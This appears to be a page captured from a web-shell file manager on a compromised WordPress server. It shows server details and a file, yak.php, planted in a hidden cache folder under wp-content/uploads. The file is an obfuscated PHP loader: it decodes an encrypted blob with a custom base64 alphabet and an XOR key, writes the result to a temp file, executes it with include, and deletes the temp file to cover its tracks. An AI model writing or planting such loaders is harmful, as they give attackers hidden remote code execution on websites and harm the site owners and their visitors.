HEX
Server: Apache/2
System: Linux server-27-254-144-72.da.direct 5.10.0-33-amd64 #1 SMP Debian 5.10.226-1 (2024-10-03) x86_64
User: bannong (1179)
PHP: 8.1.26
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/bannong/public_html/wp-content/uploads/2024/.cache/modules/
Upload Files
File: /home/bannong/public_html/wp-content/uploads/2024/.cache/modules/yak.php
<?php
$encrypted = 'XVMACRNsa0gUDgAUDAkeFTEODhhQXEMTBA0cEQIVCUQXBBcCFghYSEpabGZUFBMNDg0UMQIVCUxNQQoSEgkESUc-JikkOkQRABgYRj5IQVNQRTwmJDgrRhMAFQRXPENbQUgUDgAUDAkeFTEODhhLbGlFFBwcDgIFMQ0ECUNcQR8EEzwTBBwcAAAESTdXTkRNQUssPUQ8TUw0KDEkIjg_Mzo-MikgIDEgNSMiTUNFFBwcDgIFMQ0ECUpabGZ9awoHQURRCBA-BQUCSUcUEQAfAAcxABgYSEpBGmF6QUNBQQgZBEtDsfGg1LPVsdKg3rLisO2h47PZsdCh6rPYQbzPsOCw4738QbPWsdyg0rLhsO-g1rPbsdRQSbPcsdlQsdex2b3wsdax273ysd2w4bzIsOxIT05ZWm5rHGF6bGkIB0xYRTwyJD4mJDE6Rj41MDYkMjgvLCY1KSM0Rj5BXFFNQUQxLj8kRkNHR0wZEhAEFURUPiUoLSkjOkQUEQAfAAcEBTMWCA8EEkstSEpBGmF6QUNBQUgWCA8EEkxNQUc-JyU8JDA6RhkADQwABQkUPgUIDQkDRj5abGZ9a0NBQUwWDhFBSUgZQV5BUVdQRQpBXUwTDhYPFURUBwoNBB8rRg0ADAlXPEpaQUgZSkhIQRd9a0NBQUxQQUNBCApQSUcHCAAVEjhGBB4CDhFGPDdUCD5BXFFNQTYxLSMxJTwkMz4vLihIQRd9a0NBQUxQQUNBQUxQQUcHCAAVDwIMBExNQQEAEgkeAA4ESUgWCA8EEjdXDwIMBEstOkcIPEVLbGlBQUxQQUNBQUxQQUNFFQEALwIMBExNQUcHCAAVEjhGFQEAPg0ADAlXPDhFCDFLbGlBQUxQQUNBQUxQQUNFBQkDFQoPABgZDg1BXExUFBMNDg0UMQIVCUxeQScoMykzNSwzODMjJDMgMy0kLjFBT0xUBwoNBAIRDAZabGZ9a0NBQUxQQUNBQUxQQQoHQUQdDhUEPhkADQwABQkUPgUIDQlYRRcMESIRDAZNQUgUBBAVCAIRFQoOD0VZQRhsa0xQQUNBQUxQQUNBQUxQQUMEAgQfQUGxxbzAsdqx2kxXRQUIDQkeAA4ERkyh4rLgsdOg1LLpsdGg30Ox1rzAsdCw4b3zsdWx1LzNT18DE1JSWm5rQUxQQUNBQUxQQUNBHEwVDRAEQRd9a0NBQUxQQUNBQUxQQUNBQUwVAgsOQU6g_7LpsdSg0LPbsdxQsdyw4bzIQbPWsdyg0rLhsO-g1rPbsdlQRkcHCAAVDwIMBEteXQETX05LbGlBQUxQQUNBQUxQQUMcbGZQQUNBQUxQQR5BBAADBEMabGZQQUNBQUxQQUNBQUwVAgsOQU6g_7LpsdSg0LPbsdxQsdSx0bzDsOOw4rzHsdmx2Uyh5bPRsdWg2rPRQUsLRQUIDQkDOkQPAAEVRj46RQUtHERBSbzKsd2x1VZQGkcHCAAVEjhGBB4CDhFGPDdUCD4cSEJMAxFfQ1d9a0NBQUxQQUNBHGF6QUNBQRF9ax5sa1NObGk';
if (!function_exists('lynx')) {
    function lynx($data, $key) {
        $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_';
        $bin = '';
        for ($i = 0; $i < strlen($data); $i++) {
            $index = strpos($alphabet, $data[$i]);
            $bin .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT);
        }

        $bytes = '';
        for ($i = 0; $i < strlen($bin); $i += 8) {
            $chunk = substr($bin, $i, 8);
            if (strlen($chunk) < 8) break; // если меньше 8 бит — игнорируем
            $bytes .= chr(bindec($chunk));
        }

        $res = '';
        $klen = strlen($key);
        for ($i = 0; $i < strlen($bytes); $i++) {
            $res .= $bytes[$i] ^ $key[$i % $klen];
        }
        return $res;
    }
}

file_put_contents($tmp = tempnam(sys_get_temp_dir(), 'shf_'), lynx($encrypted, 'alpaca'));
include $tmp;
unlink($tmp);

?>
@ Telegram